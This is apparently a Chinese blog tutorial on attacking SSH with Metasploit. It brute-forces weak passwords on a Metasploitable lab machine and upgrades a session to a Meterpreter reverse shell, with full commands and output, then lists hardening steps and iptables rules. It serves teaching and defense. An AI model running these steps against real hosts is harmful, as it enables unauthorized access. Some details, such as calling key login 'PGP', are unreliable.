Metasploit实战:SSH漏洞攻击
2019-07-09 本文已影响72人
DreamsonMa
SSH弱口令破解
如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。
下面使用msfconsole对ssh弱口令进行破解:
1、登录msfconsole
➜ ~ msfconsole
2、查找对应模块
msf5 > search -S auxiliary ssh
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
auxiliary/scanner/http/cisco_firepower_login normal Yes Cisco Firepower Management Console 6.0 Login
auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal Yes GitLab User Enumeration
auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution
auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Yes Cerberus FTP Server SFTP Username Enumeration
auxiliary/scanner/ssh/detect_kippo normal Yes Kippo SSH Honeypot Detector
auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal Yes Fortinet SSH Backdoor Scanner
auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility
auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration
auxiliary/scanner/ssh/ssh_identify_pubkeys normal Yes SSH Public Key Acceptance Scanner
auxiliary/scanner/ssh/ssh_login normal Yes SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal Yes SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal Yes SSH Version Scanner
3、选择对应模块,并设置参数:
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
4、执行暴力破解
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 10.0.2.5:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.2.12:42799 -> 10.0.2.5:22) at 2019-07-09 10:05:04 -0400
[+] 10.0.2.5:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.2.12:41479 -> 10.0.2.5:22) at 2019-07-09 10:07:31 -0400
[+] 10.0.2.5:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.2.12:37033 -> 10.0.2.5:22) at 2019-07-09 10:32:43 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf5 auxiliary(scanner/ssh/ssh_login) > pwd
[*] exec: pwd
/root
重注payload,获取Meterpreter Shell
1、切换登录用户
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 shell linux SSH postgres:postgres (10.0.2.5:22) 10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
3 shell linux SSH msfadmin:msfadmin (10.0.2.5:22) 10.0.2.12:37033 -> 10.0.2.5:22 (10.0.2.5)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
whoami
user
2、获取Meterpreter Shell
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.2.12:4433
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 4 opened (10.0.2.12:4433 -> 10.0.2.5:37897) at 2019-07-09 11:25:08 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 shell linux SSH postgres:postgres (10.0.2.5:22) 10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
4 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ metasploitable.localdomain 10.0.2.12:4433 -> 10.0.2.5:37897 (10.0.2.5)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
SSH漏洞攻击防范指南
- SSH 修改默认端口
默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口。修改之后必须重新启动SSH服务。
修改SSH默认端口
- SSH 设置PGP登录
默认情况下,SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录(公钥与私钥)。
生成SSH密钥对,使用puttygen。下载链接:https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
生成SSH密钥对
使用 ssh-keygen 命令在Linux生成.ssh目录,在.ssh下新建密钥存储文件authorized_keys,并复制私钥文件到.ssh目录下。使用命令 puttygen -L “拷贝私钥文件” ,将内容拷贝到authorized_keys文件中。
使用 ssh-keygen 命令在Linux生成.ssh目录
使用命令 puttygen -L
使用Putty客户端加载私钥文件进行连接。
使用Putty客户端加载私钥文件进行连接
- SSH 防御暴力破解用户账号
在Linux下可以配置不能使用用户名和密码登录,只使用SSH PGP方式验证登录。规避了SSH暴力破解。但是,不能使用用户密码登录,很大程度上存在复杂操作。
SSH 防御暴力破解用户账号g
- Iptables设置阈值防止暴力破解
利用Iptables对多次连接验证错误,进行账户锁定120秒。在设置完之后,需要重新启动ssh服务。
iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP
推荐汇总贴: 漏洞利用套路汇总
